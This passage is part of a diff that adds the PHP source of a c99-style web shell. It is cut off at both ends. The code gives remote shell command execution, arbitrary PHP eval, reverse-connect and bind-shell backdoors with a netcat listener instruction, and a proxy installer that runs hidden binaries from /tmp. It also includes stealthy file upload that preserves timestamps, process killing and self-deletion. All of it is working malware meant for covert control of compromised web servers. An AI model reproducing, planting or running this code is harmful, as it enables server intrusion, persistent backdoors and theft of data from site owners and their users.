"ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>"; + echo "</br>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>"; + } + echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></form>"; +} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>"); + echo("$msg"); + echo("$emsg"); +} + +if ($act == "shbd"){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST> +Bind Port: <input type='text' name='backconnectport' value='5992'> +<input type='hidden' name='use' value='shbd'> +<input type='submit' value='Install Backdoor'></form>"); +echo("$msg"); +echo("$emsg"); +} + + +if ($act == "proxy") { + cf("/tmp/hantu.tgz",$proxy_shit); + ex("cd /tmp;tar -zxvf hantu.tgz"); + ex("cd /tmp;cd .setan;chmod 777 xh"); + ex("cd /tmp;cd .setan;chmod 777 httpd"); + ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start"); + checkproxyhost(); + $msg = $_POST['proxyhostmsg']; + echo("$msg"); + unlink("/tmp/hantu.tgz"); + ex("cd /tmp; rm -r .setan"); +} + +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "search"){ + echo "<b>Search file-system:</b></br></br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text)."> + +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + $execcmd = $_REQUEST['cmd']; + echo "Result Of Locally Executed Command: <b>$execcmd</b></br>"; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; + $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>"; + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b>"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} + +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if 